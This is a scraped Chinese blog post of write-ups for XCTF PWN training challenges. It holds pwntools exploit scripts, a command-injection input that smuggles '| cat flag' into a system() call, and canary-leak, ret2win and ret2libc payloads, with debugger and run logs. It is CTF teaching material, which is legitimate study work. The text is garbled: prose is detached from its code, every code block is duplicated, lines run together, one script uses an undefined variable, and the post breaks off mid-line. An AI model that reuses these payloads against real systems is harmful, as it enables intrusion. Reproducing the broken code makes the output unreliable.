-
-
攻防世界-PWN-高手进阶区-难度3到4-全部题解
-
发表于: 2021-6-12 02:00
-
通过攻防世界的一些入门难度的题目来学习最基本的漏洞利用技巧,以及提高代码审计的能力。传送门:https://adworld.xctf.org.cn/task/task_list?type=pwn&number=2&grade=1
总结可能用到的知识点:
放上我常用的做题模板:
需要打服务器的时候直接加个参数就可以:
《CTF竞赛指南》上有详解。
《CTF竞赛指南》上有详解。
这个题目涉及的漏洞是悬空指针(dangling pointer)和UAF:
可以看到,指针在用户确定退出之前就已经free了,free之后也没有及时指向NULL。这导致我们可以重新申请format_buf指向的堆内存,然后给予其新的值。再来看看show部分的代码:
可以看到如果设置了环境变量会有不少提示信息,我们这里设置一个临时变量:
然后看到程序中有system函数,而且部分参数是我们提供的输入;我们应该想到这里可以用'闭合命令,然后用管道执行一个新的命令。程序的本意是想执行这样的一条命令:
我们想要执行这样一个命令:
根据以上思路,利用悬空指针漏洞绕过检查找出flag的值:
拿到程序先看下信息:
我们需要绕过金丝雀,再看程序关键流程如下:
非常友好的题目(骗新人入坑
两个有漏洞的函数:
第一个函数的printf函数的格式化字符串由用户控制,第二个函数可从一开始的定义看出buf的缓冲区最多只有0x90的大小,而程序却可以接受0x100大小的输入,这将导致栈溢出。
最终,随便点击函数列表中的函数,发现了win函数:
到此,漏洞利用的一个思路基本可表示为一下三步:
由以上几步做exp如下:
运行下:
简单题:
这题有点意思:
有几个函数点击去看看,大概能猜到题目说的email是迷惑信息:
所以查看下汇编:
接受完数据后,程序直接跳到栈上某地址,调试中确定位置:
最终exp:
exp:
题目:
可以发现我注释的代码,利用这段代码可以向着栈内写一个字节的数据,所以这是一个简单的ret2win咯,只要将返回地址byte by byte改成win函数即可:
然而实际打过去服务器发现:
看上去调用bash失败了,这咋办呢。看了师傅们的wp我发现原来可以直接以这种形式返回shell:
最终exp:
发现是js命令,通过help()查看帮助,发现可以用os.system调用命令:
最基础的x64栈溢出:
最坑的是给出./libc-2.23.so找偏移打过去发现不对:
后来还是用LibcSearch搞定:
嗯这题也有点意思:
可以看到被调用的函数将传入的参数直接拷贝在局部变量,由于传入的参数,被调用函数的变量都在栈上,所以栈的视图大概是:
如果用传统的rop:
拷贝完栈中是这样:
要覆盖栈,所以需要padding(414141),但正因为有padding,所以必须要有gadget帮助跳过padding:
这样拷贝后就可以正常利用了:
exp如下:
简单题目:
简单的字符串格式化漏洞,先gdb调试出offset是12,然后直接用工具自动生成payload:
这个题目用到一个知识点.fini.array中的函数在main结束时被调用,所以需要修改其中的函数地址为_start,这样就可以完成攻击。攻击用到的system@plt和_start地址:
由于.fini.array中原有的数据和_start高两位都一样,只需要修改后两位,就可以那么按照从小到大写入原则,按照如下顺序写入数据:
exp如下
补充链接:详解64位静态编译程序的fini_array劫持及ROP攻击 https://www.freebuf.com/articles/system/226003.html
嗯这题命中了我知识的盲点:数组索引越界。先看看保护措施:
RWX有点显眼,第一次遇到这个记号。在程序中添加一个note之后用vmmap看下:
发现了heap可执行,其实这时候已经猜到可能是将shellcode放入堆中,但没想到如何劫持rip到堆上。这时候看了大佬的博客:https://blog.csdn.net/seaaseesa/article/details/103003167豁然开朗,原来是利用数组索引不受控制,把got表劫持了hh:
简单题目,不要跟着题目思路走,需要利用溢出替换hash值:
题目代码比较简单:
可以发现明显的栈溢出的漏洞,但是第二次循环时必须让read返回0才能顺利return,可以用这样的语句关闭流:
但之后都不能写入流了,除非重开程序。那么这就要求我们一次输入完成ROP利用链条。在程序中搜到的一些信息:
这里参考了大佬的wp:https://blog.csdn.net/seaaseesa/article/details/102992887
利用思路总结如下:
优化过的exp如下:
import sys
from pwn import *
from LibcSearcher import LibcSearcher
rv = lambda : io.recv()
rl = lambda a=False : io.recvline(a)
ru = lambda a,b=True : io.recvuntil(a,b)
rn = lambda x : io.recvn(x)
se = lambda x : io.send(x)
sl = lambda x : io.sendline(x)
sa = lambda a,b : io.sendafter(a,b)
sla = lambda a,b : io.sendlineafter(a,b)
sconnect = lambda : io.interactive()
context.log_level = "DEBUG"
pwn_file = './pwn7'
elf = ELF(pwn_file)
if len(sys.argv) < 2:
IS_LOCAL = 1
io = process(pwn_file)
else:
IS_LOCAL = 0
sys_argv = sys.argv[1].split(':')
io = remote(sys_argv[0], int(sys_argv[1]))
#---------------------------------------------------------payload = '1'+'\x00'*6+'\xFF\x00'
'''if IS_LOCAL: gdb.attach(io,"break *0x8048824\nc")
pause()
'''se(payload)puts_addr = u32(io.recv()[:4])
if IS_LOCAL:
libc = ELF('/lib/i386-linux-gnu/libc.so.6')
libc_base = printf_addr - libc.sym['printf']
system_addr = libc_base + libc.sym['system']
else:
libc = ELF('libc6-i386_2.23-0ubuntu11.2_amd64.so')
libc_base = printf_addr - libc.sym['printf']
system_addr = libc_base + libc.sym['system']
#or choose to use LibcSearcher''' libc=LibcSearcher('puts',puts_addr)
libc_base = puts_addr - libc.dump('puts')
system_addr = libc_base + libc.dump('system')
str_bin_sh = libc_base + libc.dump('str_bin_sh')
'''log.info('puts_addr: 0x%x'%puts_addr)
log.info('system_addr: 0x%x'%system_addr)
log.info('str_bin_sh: 0x%x'%str_bin_sh)
payload = 'A'*235+p32(system_addr)+p32(0xdeadbeef)+p32(str_bin_sh)
se(payload)sconnect()import sys
from pwn import *
from LibcSearcher import LibcSearcher
rv = lambda : io.recv()
rl = lambda a=False : io.recvline(a)
ru = lambda a,b=True : io.recvuntil(a,b)
rn = lambda x : io.recvn(x)
se = lambda x : io.send(x)
sl = lambda x : io.sendline(x)
sa = lambda a,b : io.sendafter(a,b)
sla = lambda a,b : io.sendlineafter(a,b)
sconnect = lambda : io.interactive()
context.log_level = "DEBUG"
pwn_file = './pwn7'
elf = ELF(pwn_file)
if len(sys.argv) < 2:
IS_LOCAL = 1
io = process(pwn_file)
else:
IS_LOCAL = 0
sys_argv = sys.argv[1].split(':')
io = remote(sys_argv[0], int(sys_argv[1]))
#---------------------------------------------------------payload = '1'+'\x00'*6+'\xFF\x00'
'''if IS_LOCAL: gdb.attach(io,"break *0x8048824\nc")
pause()
'''se(payload)puts_addr = u32(io.recv()[:4])
if IS_LOCAL:
libc = ELF('/lib/i386-linux-gnu/libc.so.6')
libc_base = printf_addr - libc.sym['printf']
system_addr = libc_base + libc.sym['system']
else:
libc = ELF('libc6-i386_2.23-0ubuntu11.2_amd64.so')
libc_base = printf_addr - libc.sym['printf']
system_addr = libc_base + libc.sym['system']
#or choose to use LibcSearcher''' libc=LibcSearcher('puts',puts_addr)
libc_base = puts_addr - libc.dump('puts')
system_addr = libc_base + libc.dump('system')
str_bin_sh = libc_base + libc.dump('str_bin_sh')
'''log.info('puts_addr: 0x%x'%puts_addr)
log.info('system_addr: 0x%x'%system_addr)
log.info('str_bin_sh: 0x%x'%str_bin_sh)
payload = 'A'*235+p32(system_addr)+p32(0xdeadbeef)+p32(str_bin_sh)
se(payload)sconnect()python exp.py 111.200.241.244:56070
python exp.py 111.200.241.244:56070
__int64 sub_400F8F(){ __int64 result; // rax
char s[16]; // [rsp+8h] [rbp-20h] BYREF
unsigned __int64 v2; // [rsp+18h] [rbp-10h]
v2 = __readfsqword(0x28u);
free_400C7E(FORMAT_BUF_HEAP); // double free
free_400C7E(time_zone_heap);
__printf_chk(1LL, "Are you sure you want to exit (y/N)? ");
fflush(stdout);
fgets(s, 16, stdin);
result = 0LL;
if ( (s[0] & 0xDF) == 'Y' )
{
puts("OK, exiting.");
result = 1LL;
}
return result;
}__int64 sub_400F8F(){ __int64 result; // rax
char s[16]; // [rsp+8h] [rbp-20h] BYREF
unsigned __int64 v2; // [rsp+18h] [rbp-10h]
v2 = __readfsqword(0x28u);
free_400C7E(FORMAT_BUF_HEAP); // double free
free_400C7E(time_zone_heap);
__printf_chk(1LL, "Are you sure you want to exit (y/N)? ");
fflush(stdout);
fgets(s, 16, stdin);
result = 0LL;
if ( (s[0] & 0xDF) == 'Y' )
{
puts("OK, exiting.");
result = 1LL;
}
return result;
}__int64 sub_400EA3(){ char command[2048]; // [rsp+8h] [rbp-810h] BYREF
unsigned __int64 v2; // [rsp+808h] [rbp-10h]
v2 = __readfsqword(0x28u);
if ( FORMAT_BUF_HEAP )
{
__snprintf_chk(command, 2048LL, 1LL, 2048LL, "/bin/date -d @%d +'%s'", TIME, FORMAT_BUF_HEAP);
__printf_chk(1LL, "Your formatted time is: ");
fflush(stdout);
if ( getenv("DEBUG") )
__fprintf_chk(stderr, 1LL, "Running command: %s\n", command);
setenv("TZ", time_zone_heap, 1);
system(command);
}
else
{
puts("You haven't specified a format!");
}
return 0LL;
}__int64 sub_400EA3(){ char command[2048]; // [rsp+8h] [rbp-810h] BYREF
unsigned __int64 v2; // [rsp+808h] [rbp-10h]
v2 = __readfsqword(0x28u);
if ( FORMAT_BUF_HEAP )
{
__snprintf_chk(command, 2048LL, 1LL, 2048LL, "/bin/date -d @%d +'%s'", TIME, FORMAT_BUF_HEAP);
__printf_chk(1LL, "Your formatted time is: ");
fflush(stdout);
if ( getenv("DEBUG") )
__fprintf_chk(stderr, 1LL, "Running command: %s\n", command);
setenv("TZ", time_zone_heap, 1);
system(command);
}
else
{
puts("You haven't specified a format!");
}
return 0LL;
}export DEBUG=1
export DEBUG=1
date -d @1568880277 +"%Y-%m-%d %H:%M:%S"
2019-09-19 16:04:37
date -d @1568880277 +"%Y-%m-%d %H:%M:%S"
2019-09-19 16:04:37
/bin/date -d @0 +'%y' | cat 'flag'
/bin/date -d @0 +'%y' | cat 'flag'
dc@ubuntu:~/playground$ ./time_formatter
Welcome to Mary's Unix Time Formatter!1) Set a time format.
2) Set a time.
3) Set a time zone.
4) Print your time.
5) Exit.
> 1
Format: b
strdup(0x7fffffffd948) = 0x603420
Format set.
1) Set a time format.
2) Set a time.
3) Set a time zone.
4) Print your time.
5) Exit.
> 5
free(0x603420)
free((nil))Are you sure you want to exit (y/N)? n
1) Set a time format.
2) Set a time.
3) Set a time zone.
4) Print your time.
5) Exit.
> 3
Time zone: %y' | cat 'flag
strdup(0x7fffffffd948) = 0x603420 # assert timeformat_buf == timezone
Time zone set.
1) Set a time format.
2) Set a time.
3) Set a time zone.
4) Print your time.
5) Exit.
> 4
Your formatted time is: Running command: /bin/date -d @0 +'%y' | cat 'flag'
flag{ABCD}1) Set a time format.
2) Set a time.
3) Set a time zone.
4) Print your time.
5) Exit.
> ^Cdc@ubuntu:~/playground$ ./time_formatter
Welcome to Mary's Unix Time Formatter!1) Set a time format.
2) Set a time.
3) Set a time zone.
4) Print your time.
5) Exit.
> 1
Format: b
strdup(0x7fffffffd948) = 0x603420
Format set.
1) Set a time format.
2) Set a time.
3) Set a time zone.
4) Print your time.
5) Exit.
> 5
free(0x603420)
free((nil))Are you sure you want to exit (y/N)? n
1) Set a time format.
2) Set a time.
3) Set a time zone.
4) Print your time.
5) Exit.
> 3
Time zone: %y' | cat 'flag
strdup(0x7fffffffd948) = 0x603420 # assert timeformat_buf == timezone
Time zone set.
1) Set a time format.
2) Set a time.
3) Set a time zone.
4) Print your time.
5) Exit.
> 4
Your formatted time is: Running command: /bin/date -d @0 +'%y' | cat 'flag'
flag{ABCD}1) Set a time format.
2) Set a time.
3) Set a time zone.
4) Print your time.
5) Exit.
> ^Cdc@ubuntu:~/playground$ file 22e2d7579d2d4359a5a1735edddef631
22e2d7579d2d4359a5a1735edddef631: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=b7971b84c2309bdb896e6e39073303fc13668a38, stripped
dc@ubuntu:~/playground$ pwn checksec 22e2d7579d2d4359a5a1735edddef631
[*] '/home/dc/playground/22e2d7579d2d4359a5a1735edddef631'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
dc@ubuntu:~/playground$ file 22e2d7579d2d4359a5a1735edddef631
22e2d7579d2d4359a5a1735edddef631: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=b7971b84c2309bdb896e6e39073303fc13668a38, stripped
dc@ubuntu:~/playground$ pwn checksec 22e2d7579d2d4359a5a1735edddef631
[*] '/home/dc/playground/22e2d7579d2d4359a5a1735edddef631'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
void __fastcall __noreturn main(int a1, char **a2, char **a3)
{ int v3; // [rsp+24h] [rbp-Ch] BYREF
unsigned __int64 v4; // [rsp+28h] [rbp-8h]
v4 = __readfsqword(0x28u);
sub_4009FF();
puts("Welcome to the battle ! ");
puts("[Great Fairy] level pwned ");
puts("Select your weapon ");
while ( 1 )
{
while ( 1 )
{
sub_4009DA();
__isoc99_scanf("%d", &v3);
if ( v3 != 2 )
break;
sub_4008EB();
}
if ( v3 == 3 )
{
puts("Bye ");
exit(0);
}
if ( v3 == 1 )
sub_400960();
else
puts("Wrong!");
}
}unsigned int sub_4009FF()
{ setvbuf(stdin, 0LL, 1, 0LL);
setvbuf(stdout, 0LL, 2, 0LL);
return alarm(0x14u);
}int sub_4009DA()
{ puts("1. Stack Bufferoverflow Bug ");
puts("2. Format String Bug ");
return puts("3. Exit the battle ");
}void __fastcall __noreturn main(int a1, char **a2, char **a3)
{ int v3; // [rsp+24h] [rbp-Ch] BYREF
unsigned __int64 v4; // [rsp+28h] [rbp-8h]
v4 = __readfsqword(0x28u);
sub_4009FF();
puts("Welcome to the battle ! ");
puts("[Great Fairy] level pwned ");
puts("Select your weapon ");
while ( 1 )
{
while ( 1 )
{
sub_4009DA();
__isoc99_scanf("%d", &v3);
if ( v3 != 2 )
break;
sub_4008EB();
}
if ( v3 == 3 )
{
puts("Bye ");
exit(0);
}
if ( v3 == 1 )
sub_400960();
else
puts("Wrong!");
}
}unsigned int sub_4009FF()
{ setvbuf(stdin, 0LL, 1, 0LL);
setvbuf(stdout, 0LL, 2, 0LL);
return alarm(0x14u);
}int sub_4009DA()
{ puts("1. Stack Bufferoverflow Bug ");
puts("2. Format String Bug ");
return puts("3. Exit the battle ");
}unsigned __int64 sub_4008EB(){ char buf[136]; // [rsp+0h] [rbp-90h] BYREF
unsigned __int64 v2; // [rsp+88h] [rbp-8h]
v2 = __readfsqword(0x28u);
memset(buf, 0, 0x80uLL);
read(0, buf, 0x7FuLL);
printf(buf);
return __readfsqword(0x28u) ^ v2;
}unsigned __int64 sub_400960(){ char buf[136]; // [rsp+0h] [rbp-90h] BYREF
unsigned __int64 v2; // [rsp+88h] [rbp-8h]
v2 = __readfsqword(0x28u);
memset(buf, 0, 0x80uLL);
read(0, buf, 0x100uLL);
printf("-> %s\n", buf);
return __readfsqword(0x28u) ^ v2;
}unsigned __int64 sub_4008EB(){ char buf[136]; // [rsp+0h] [rbp-90h] BYREF
unsigned __int64 v2; // [rsp+88h] [rbp-8h]
v2 = __readfsqword(0x28u);
memset(buf, 0, 0x80uLL);
read(0, buf, 0x7FuLL);
printf(buf);
return __readfsqword(0x28u) ^ v2;
}unsigned __int64 sub_400960(){ char buf[136]; // [rsp+0h] [rbp-90h] BYREF
unsigned __int64 v2; // [rsp+88h] [rbp-8h]
v2 = __readfsqword(0x28u);
memset(buf, 0, 0x80uLL);
read(0, buf, 0x100uLL);
printf("-> %s\n", buf);
return __readfsqword(0x28u) ^ v2;
}int sub_4008DA()
{ return system("/bin/cat ./flag");
}int sub_4008DA()
{ return system("/bin/cat ./flag");
}from pwn import *
context.log_level = "DEBUG"
io = process('./22e2d7579d2d4359a5a1735edddef631')
io.recv()io.send('2\n')
io.send('%23$p\n')
canary = int(io.recvline(),16)
log.info('canary == 0x%x' % canary)
io.recv()io.send('1\n')
io.send('A'*0x88+p64(canary)+p64(0xdeadbeef)+p64(0x4008DA))
io.recv()from pwn import *
context.log_level = "DEBUG"
io = process('./22e2d7579d2d4359a5a1735edddef631')
io.recv()io.send('2\n')
io.send('%23$p\n')
canary = int(io.recvline(),16)
log.info('canary == 0x%x' % canary)
io.recv()io.send('1\n')
io.send('A'*0x88+p64(canary)+p64(0xdeadbeef)+p64(0x4008DA))
io.recv()dc@ubuntu:~/playground$ echo 'my_flag{123}' > flag
dc@ubuntu:~/playground$ python payload_22e2.py
[+] Starting local process './22e2d7579d2d4359a5a1735edddef631' argv=['./22e2d7579d2d4359a5a1735edddef631'] : pid 85064
[DEBUG] Received 0x8f bytes:
'Welcome to the battle ! \n'
'[Great Fairy] level pwned \n'
'Select your weapon \n'
'1. Stack Bufferoverflow Bug \n'
'2. Format String Bug \n'
'3. Exit the battle \n'
[DEBUG] Sent 0x2 bytes:
'2\n'
[DEBUG] Sent 0x6 bytes:
'%23$p\n'
[DEBUG] Received 0x5a bytes:
'0x433c813a1d175800\n'
'1. Stack Bufferoverflow Bug \n'
'2. Format String Bug \n'
'3. Exit the battle \n'
[*] canary == 0x433c813a1d175800
[DEBUG] Sent 0x2 bytes:
'1\n'
[DEBUG] Sent 0xa0 bytes:
00000000 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 │AAAA│AAAA│AAAA│AAAA│
*
00000080 41 41 41 41 41 41 41 41 00 58 17 1d 3a 81 3c 43 │AAAA│AAAA│·X··│:·<C│
00000090 ef be ad de 00 00 00 00 da 08 40 00 00 00 00 00 │····│····│··@·│····│
000000a0
[DEBUG] Received 0x99 bytes:
'-> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n'
'my_flag{123}\n'
dc@ubuntu:~/playground$ echo 'my_flag{123}' > flag
dc@ubuntu:~/playground$ python payload_22e2.py
[+] Starting local process './22e2d7579d2d4359a5a1735edddef631' argv=['./22e2d7579d2d4359a5a1735edddef631'] : pid 85064
[DEBUG] Received 0x8f bytes:
'Welcome to the battle ! \n'
'[Great Fairy] level pwned \n'
'Select your weapon \n'
'1. Stack Bufferoverflow Bug \n'
'2. Format String Bug \n'
'3. Exit the battle \n'
[DEBUG] Sent 0x2 bytes:
'2\n'
[DEBUG] Sent 0x6 bytes:
'%23$p\n'
[DEBUG] Received 0x5a bytes:
'0x433c813a1d175800\n'
'1. Stack Bufferoverflow Bug \n'
'2. Format String Bug \n'
'3. Exit the battle \n'
[*] canary == 0x433c813a1d175800
[DEBUG] Sent 0x2 bytes:
'1\n'
[DEBUG] Sent 0xa0 bytes:
00000000 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 │AAAA│AAAA│AAAA│AAAA│
*
00000080 41 41 41 41 41 41 41 41 00 58 17 1d 3a 81 3c 43 │AAAA│AAAA│·X··│:·<C│
00000090 ef be ad de 00 00 00 00 da 08 40 00 00 00 00 00 │····│····│··@·│····│
000000a0
[DEBUG] Received 0x99 bytes:
'-> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n'
'my_flag{123}\n'
from pwn import *
from LibcSearcher import LibcSearcher
se=lambda x:io.send(x)
sl=lambda x:io.sendline(x)
sa=lambda x,y:io.sendafter(x,y)
rv=lambda :io.recv()
sconnect=lambda :io.interactive()
IS_LOCAL = 0
context.log_level = "DEBUG"
pwn_file = './dice_game'
elf = ELF(pwn_file)
if IS_LOCAL:
io = process(pwn_file)
else:
io = remote('111.200.241.244','55568')
#---------------------------------------------------------payload = 'A'*0x40+p64(0)
nums = [2,5,4,2,6,2,5,1,4,2,3,2,3,2,6,5,1,1,5,5,6,3,4,4,3,3,3,2,2,2,6,1,1,1,6,4,2,5,2,5,4,4,4,6,3,2,3,3,6,1]
sa("Welcome, let me know your name: ",payload)
for index in range(50):
sa("Give me the point(1~6): ",str(nums[index])+'\n')
rv()print(rv())
from pwn import *
from LibcSearcher import LibcSearcher
se=lambda x:io.send(x)
sl=lambda x:io.sendline(x)
sa=lambda x,y:io.sendafter(x,y)
rv=lambda :io.recv()
sconnect=lambda :io.interactive()
IS_LOCAL = 0
context.log_level = "DEBUG"
pwn_file = './dice_game'
elf = ELF(pwn_file)
if IS_LOCAL:
io = process(pwn_file)
else:
io = remote('111.200.241.244','55568')
#---------------------------------------------------------payload = 'A'*0x40+p64(0)
nums = [2,5,4,2,6,2,5,1,4,2,3,2,3,2,6,5,1,1,5,5,6,3,4,4,3,3,3,2,2,2,6,1,1,1,6,4,2,5,2,5,4,4,4,6,3,2,3,3,6,1]
sa("Welcome, let me know your name: ",payload)
for index in range(50):
sa("Give me the point(1~6): ",str(nums[index])+'\n')
rv()print(rv())
int __cdecl main()
{ size_t v0; // ebx
char input[32]; // [esp+10h] [ebp-74h] BYREF
_DWORD v3[10]; // [esp+30h] [ebp-54h]
char name[32]; // [esp+58h] [ebp-2Ch] BYREF
int choice; // [esp+78h] [ebp-Ch]
size_t index; // [esp+7Ch] [ebp-8h]
choice = 1;
v3[0] = sub_8048604;
v3[1] = sub_8048618;
v3[2] = sub_804862C;
v3[3] = sub_8048640;
v3[4] = sub_8048654;
v3[5] = sub_8048668;
v3[6] = sub_804867C;
v3[7] = sub_8048690;
v3[8] = sub_80486A4;
v3[9] = sub_80486B8;
puts("What is your name?");
printf("> ");
fflush(stdout);
fgets(name, 32, stdin);
sub_80485DD(name);
fflush(stdout);
printf("I should give you a pointer perhaps. Here: %x\n\n", sub_8048654);
fflush(stdout);
puts("Enter the string to be validate");
printf("> ");
fflush(stdout);
__isoc99_scanf("%s", input); // may stack overflow
for ( index = 0; ; ++index )
{
v0 = index;
if ( v0 >= strlen(input) )
break;
switch ( choice )
{
case 1:
if ( sub_8048702(input[index]) )
choice = 2;
break;
case 2:
if ( input[index] == '@' )
choice = 3;
break;
case 3:
if ( sub_804874C(input[index]) )
choice = 4;
break;
case 4:
if ( input[index] == '.' )
choice = 5;
break;
case 5:
if ( sub_8048784(input[index]) )
choice = 6;
break;
case 6:
if ( sub_8048784(input[index]) )
choice = 7;
break;
case 7:
if ( sub_8048784(input[index]) )
choice = 8;
break;
case 8:
if ( sub_8048784(input[index]) )
choice = 9;
break;
case 9:
choice = 10;
break;
default:
continue;
}
}
(v3[--choice])();
return fflush(stdout);
}int __cdecl main()
{ size_t v0; // ebx
char input[32]; // [esp+10h] [ebp-74h] BYREF
_DWORD v3[10]; // [esp+30h] [ebp-54h]
char name[32]; // [esp+58h] [ebp-2Ch] BYREF
int choice; // [esp+78h] [ebp-Ch]
size_t index; // [esp+7Ch] [ebp-8h]
choice = 1;
v3[0] = sub_8048604;
v3[1] = sub_8048618;
v3[2] = sub_804862C;
v3[3] = sub_8048640;
v3[4] = sub_8048654;
v3[5] = sub_8048668;
v3[6] = sub_804867C;
v3[7] = sub_8048690;
v3[8] = sub_80486A4;
v3[9] = sub_80486B8;
puts("What is your name?");
printf("> ");
fflush(stdout);
fgets(name, 32, stdin);
sub_80485DD(name);
fflush(stdout);
printf("I should give you a pointer perhaps. Here: %x\n\n", sub_8048654);
fflush(stdout);
puts("Enter the string to be validate");
printf("> ");
fflush(stdout);
__isoc99_scanf("%s", input); // may stack overflow
for ( index = 0; ; ++index )
{
v0 = index;
if ( v0 >= strlen(input) )
break;
switch ( choice )
{
case 1:
if ( sub_8048702(input[index]) )
choice = 2;
break;
case 2:
if ( input[index] == '@' )
choice = 3;
break;
case 3:
if ( sub_804874C(input[index]) )
choice = 4;
break;
case 4:
if ( input[index] == '.' )
choice = 5;
break;
case 5:
if ( sub_8048784(input[index]) )
choice = 6;
break;
case 6:
if ( sub_8048784(input[index]) )
choice = 7;
break;
case 7:
if ( sub_8048784(input[index]) )
choice = 8;
break;
case 8:
if ( sub_8048784(input[index]) )
choice = 9;
break;
case 9:
choice = 10;
break;
default:
continue;
}
}
(v3[--choice])();
return fflush(stdout);
}int sub_8048604()
{ return puts("Dude, you seriously think this is going to work. Where are the fancy @ and [dot], huh?");
}int sub_8048604()
{ return puts("Dude, you seriously think this is going to work. Where are the fancy @ and [dot], huh?");
}.text:08048A40 mov ebx, [esp+7Ch]
.text:08048A44 lea eax, [esp+84h+input]
.text:08048A48 mov [esp], eax ; s
.text:08048A4B call _strlen
.text:08048A50 cmp ebx, eax
.text:08048A52 jb loc_80488CF
.text:08048A58 sub dword ptr [esp+78h], 1
.text:08048A5D mov eax, [esp+78h]
.text:08048A61 mov eax, [esp+eax*4+30h]
.text:08048A65 call eax
.text:08048A40 mov ebx, [esp+7Ch]
.text:08048A44 lea eax, [esp+84h+input]
.text:08048A48 mov [esp], eax ; s
.text:08048A4B call _strlen
.text:08048A50 cmp ebx, eax
.text:08048A52 jb loc_80488CF
.text:08048A58 sub dword ptr [esp+78h], 1
.text:08048A5D mov eax, [esp+78h]
.text:08048A61 mov eax, [esp+eax*4+30h]
.text:08048A65 call eax
─────────────────────────────────────────────────────────────── code:x86:32 ────
0x8048a52 jb 0x80488cf
0x8048a58 sub DWORD PTR [esp+0x78], 0x1
0x8048a5d mov eax, DWORD PTR [esp+0x78]
→ 0x8048a61 mov eax, DWORD PTR [esp+eax*4+0x30]
0x8048a65 call eax
0x8048a67 mov eax, ds:0x804b060
0x8048a6c mov DWORD PTR [esp], eax
0x8048a6f call 0x8048450 <fflush@plt>
0x8048a74 mov ebx, DWORD PTR [ebp-0x4]
─────────────────────────────────────────────────────────────────── threads ────[#0] Id 1, Name: "forgot", stopped 0x8048a61 in ?? (), reason: BREAKPOINT
───────────────────────────────────────────────────────────────────── trace ────[#0] 0x8048a61 → mov eax, DWORD PTR [esp+eax*4+0x30]
[#1] 0xf7d57647 → __libc_start_main()
[#2] 0x8048501 → hlt
────────────────────────────────────────────────────────────────────────────────gef➤ dereference $esp 40
0xff885aa0│+0x0000: 0xff885ab0 → 0x41414141 ← $esp
0xff885aa4│+0x0004: 0xff885ab0 → 0x41414141
0xff885aa8│+0x0008: 0xf7ef25a0 → 0xfbad2088
0xff885aac│+0x000c: 0x00000000
0xff885ab0│+0x0010: 0x41414141
0xff885ab4│+0x0014: 0x41414141
0xff885ab8│+0x0018: 0x41414141
0xff885abc│+0x001c: 0x41414141
0xff885ac0│+0x0020: 0x41414141
0xff885ac4│+0x0024: 0x41414141
0xff885ac8│+0x0028: 0x41414141
0xff885acc│+0x002c: 0x41414141
0xff885ad0│+0x0030: 0x080486cc → push ebp
─────────────────────────────────────────────────────────────── code:x86:32 ────
0x8048a52 jb 0x80488cf
0x8048a58 sub DWORD PTR [esp+0x78], 0x1
0x8048a5d mov eax, DWORD PTR [esp+0x78]
→ 0x8048a61 mov eax, DWORD PTR [esp+eax*4+0x30]
0x8048a65 call eax
0x8048a67 mov eax, ds:0x804b060
0x8048a6c mov DWORD PTR [esp], eax
0x8048a6f call 0x8048450 <fflush@plt>
0x8048a74 mov ebx, DWORD PTR [ebp-0x4]
─────────────────────────────────────────────────────────────────── threads ────[#0] Id 1, Name: "forgot", stopped 0x8048a61 in ?? (), reason: BREAKPOINT
───────────────────────────────────────────────────────────────────── trace ────[#0] 0x8048a61 → mov eax, DWORD PTR [esp+eax*4+0x30]
[#1] 0xf7d57647 → __libc_start_main()
[#2] 0x8048501 → hlt
────────────────────────────────────────────────────────────────────────────────gef➤ dereference $esp 40
0xff885aa0│+0x0000: 0xff885ab0 → 0x41414141 ← $esp
0xff885aa4│+0x0004: 0xff885ab0 → 0x41414141
0xff885aa8│+0x0008: 0xf7ef25a0 → 0xfbad2088
0xff885aac│+0x000c: 0x00000000
0xff885ab0│+0x0010: 0x41414141
0xff885ab4│+0x0014: 0x41414141
0xff885ab8│+0x0018: 0x41414141
0xff885abc│+0x001c: 0x41414141
0xff885ac0│+0x0020: 0x41414141
0xff885ac4│+0x0024: 0x41414141
0xff885ac8│+0x0028: 0x41414141
0xff885acc│+0x002c: 0x41414141
0xff885ad0│+0x0030: 0x080486cc → push ebp
from pwn import *
from LibcSearcher import LibcSearcher
se=lambda x:io.send(x)
sl=lambda x:io.sendline(x)
sa=lambda x,y:io.sendafter(x,y)
rv=lambda :io.recv()
sconnect=lambda :io.interactive()
IS_LOCAL = 1
context.log_level = "DEBUG"
pwn_file = './forgot'
elf = ELF(pwn_file)
if IS_LOCAL:
io = process(pwn_file)
else:
io = remote('111.200.241.244','57736')
#---------------------------------------------------------payload = 'A'*8*4 + p32(0x80486CC)
if IS_LOCAL:
gdb.attach(io,"break *0x8048A61\nc")
pause()
sa("> ",'noname\n')
sa("> ",payload+'\n')
rv()rv()rv()from pwn import *
from LibcSearcher import LibcSearcher
se=lambda x:io.send(x)
sl=lambda x:io.sendline(x)
sa=lambda x,y:io.sendafter(x,y)
rv=lambda :io.recv()
sconnect=lambda :io.interactive()
IS_LOCAL = 1
context.log_level = "DEBUG"
pwn_file = './forgot'
elf = ELF(pwn_file)
if IS_LOCAL:
io = process(pwn_file)
else:
io = remote('111.200.241.244','57736')
#---------------------------------------------------------payload = 'A'*8*4 + p32(0x80486CC)
if IS_LOCAL:
gdb.attach(io,"break *0x8048A61\nc")
pause()
sa("> ",'noname\n')
sa("> ",payload+'\n')
rv()rv()rv()from pwn import *
context.log_level = "DEBUG"
#io = process('./warmup_csaw_2016')io = remote('node3.buuoj.cn','26740')
io.recv()io.sendline('A'*0x48+p64(0x40060d))
io.recv()from pwn import *
context.log_level = "DEBUG"
#io = process('./warmup_csaw_2016')io = remote('node3.buuoj.cn','26740')
io.recv()io.sendline('A'*0x48+p64(0x40060d))
io.recv()int __cdecl main(int argc, const char **argv, const char **envp)
